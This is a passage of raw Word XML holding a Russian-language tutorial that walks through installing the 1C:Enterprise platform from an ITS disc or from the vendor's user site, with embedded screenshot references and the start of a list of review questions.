          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2284950" cy="1345340"/>
            <wp:effectExtent l="19050" t="0" r="1050" b="0"/>
            <wp:docPr id="411" name="Рисунок 28286" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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6" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image260.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId301" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2286032" cy="1345977"/>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После непродолжительного ожидания появляется окно приветствия программы установки. Нажимаем «Далее»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2191350" cy="1673048"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="412" name="Рисунок 28287" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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7" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image261.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId302" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2191524" cy="1673181"/>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Здесь мы можем выбрать компоненты платформы и папку для установки. Состав компонентов изменять не нужно, рекомендуется устанавливать 1С в папку по умолчанию. Нажимаем «Далее»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2227350" cy="1694539"/>
            <wp:effectExtent l="19050" t="0" r="1500" b="0"/>
            <wp:docPr id="413" name="Рисунок 28288" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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8" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image262.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId303" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2227476" cy="1694635"/>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Теперь нужно выбрать язык установки, если у вас Windows на русском языке, оставляем без изменений, если нет, выбираем русский, либо оставляем значение Системные установки, в этом случае 1С установится на языке вашей операционной системы. Нажимаем «Далее»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2155350" cy="1639762"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="414" name="Рисунок 28289" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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9" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image263.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId304" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2155472" cy="1639855"/>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Теперь все готово для начала установки. Нажимаем «Установить»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2155350" cy="1639763"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="415" name="Рисунок 28290" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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0" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image264.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId305" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2155472" cy="1639856"/>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Ждем окончания установки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2144020" cy="1634400"/>
            <wp:effectExtent l="19050" t="0" r="8630" b="0"/>
            <wp:docPr id="416" name="Рисунок 28291" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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1" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image265.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId306" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2144096" cy="1634458"/>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Далее нам предлагают установить драйвер защиты. Он нужен только в том случае, если вы используете аппаратную защиту, т.е. USB ключ. Если у вас программная лицензия без USB HASP ключа защиты, убираем галочку. Также,если вы используете USB ключ защиты и вы обновляете платформу, а не устанавливаете впервые, то установка драйвера защиты не требуется, так как он уже установлен вместе с более старым релизом платформы. Нажимаем «Далее»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2147095" cy="1635091"/>
            <wp:effectExtent l="19050" t="0" r="5555" b="0"/>
            <wp:docPr id="417" name="Рисунок 28292" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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2" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image266.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId307" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2147009" cy="1635026"/>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Программа установки завершена. Убираем галочку с «Открыть файл Readme» если не хотим читать дополнительную информацию и нажимаем «Готово»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2104950" cy="1601419"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="418" name="Рисунок 28293" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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3" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image267.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId308" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2105069" cy="1601509"/>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b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установка платформы 1С 8.3 с сайта users.v8.1c.ru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если у вас по каким то причинам нет диска ИТС и вам необходимо установить, либо обновить платформу, вы можете скачать ее с сайта users.v8.1c.ru. Итак, подключаемся к интернету, запускаем любой из имеющихся у вас браузеров и переходим на сайт users.v8.1c.ru:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5025390" cy="266700"/>
            <wp:effectExtent l="19050" t="0" r="3810" b="0"/>
            <wp:docPr id="419" name="Рисунок 28296" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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6" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image268.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId309" cstate="print"/>
                    <a:srcRect b="91042"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5025390" cy="266700"/>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Появляется страница поддержки пользователей системы 1С предприятие. Здесь вам нужно ввести ваш логин и пароль для входа на сайт. Если вы еще не получили логин и пароль,то вам необходимо получить их нажав «Самостоятельная регистрация пользователей по пинкоду». Вводим и нажимаем «Войти»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2608950" cy="1534590"/>
            <wp:effectExtent l="19050" t="0" r="900" b="0"/>
            <wp:docPr id="420" name="Рисунок 28297" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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7" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image269.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId310" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2609127" cy="1534694"/>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Мы попадаем в раздел «Сводная информация»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2673750" cy="1572706"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="421" name="Рисунок 28298" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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8" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image270.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId311" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2673931" cy="1572812"/>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 xml:space="preserve"> Листаем ниже, находим раздел «Технологическая платформа 8.2» и нажимаем на него:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2140950" cy="1263721"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="422" name="Рисунок 28299" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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9" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image271.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId312" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2142783" cy="1264803"/>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Из списка последних выпущенных релизы выбираем самую последнюю версию платформы. Она находится в самом верху списка:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2198550" cy="1296073"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="423" name="Рисунок 28300" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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0" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image272.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId313" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2198350" cy="1295955"/>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В данном случае нажимаем «8.2.16.352»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2608315" cy="1535883"/>
            <wp:effectExtent l="19050" t="0" r="1535" b="0"/>
            <wp:docPr id="424" name="Рисунок 28301" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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1" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image272.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId314" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2608375" cy="1535918"/>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Здесь выбираем пункт «Технологическая платформа 1С:Предприятия для Windows»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2313750" cy="1364095"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="425" name="Рисунок 28302" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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2" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image273.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId315" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2314056" cy="1364275"/>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Нажимаем «Скачать дистрибутив»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2313750" cy="1362431"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="426" name="Рисунок 28303" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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3" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image274.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId316" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2313803" cy="1362462"/>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После скачивания у нас имеется заархивированный файл с дистрибутивом платформы (*.rar):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2313750" cy="1658926"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="427" name="Рисунок 28304" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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4" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image275.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId317" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2313461" cy="1658719"/>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Распаковываем его любым имеющимся у вас архиватором:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2212950" cy="1584744"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="428" name="Рисунок 28305" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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5" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image276.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId318" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2212872" cy="1584688"/>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 xml:space="preserve"> После распаковки архива, заходим в папку и запускаем setup.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2212950" cy="1820516"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="429" name="Рисунок 28306" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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6" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image277.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId319" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2213201" cy="1820723"/>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Появляется окно установки. Процесс установки аналогичен процессу установки с диска ИТС описанному выше:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2140950" cy="1637003"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="430" name="Рисунок 28307" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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7" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image261.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId302" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2140916" cy="1636977"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое программное обеспечение?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
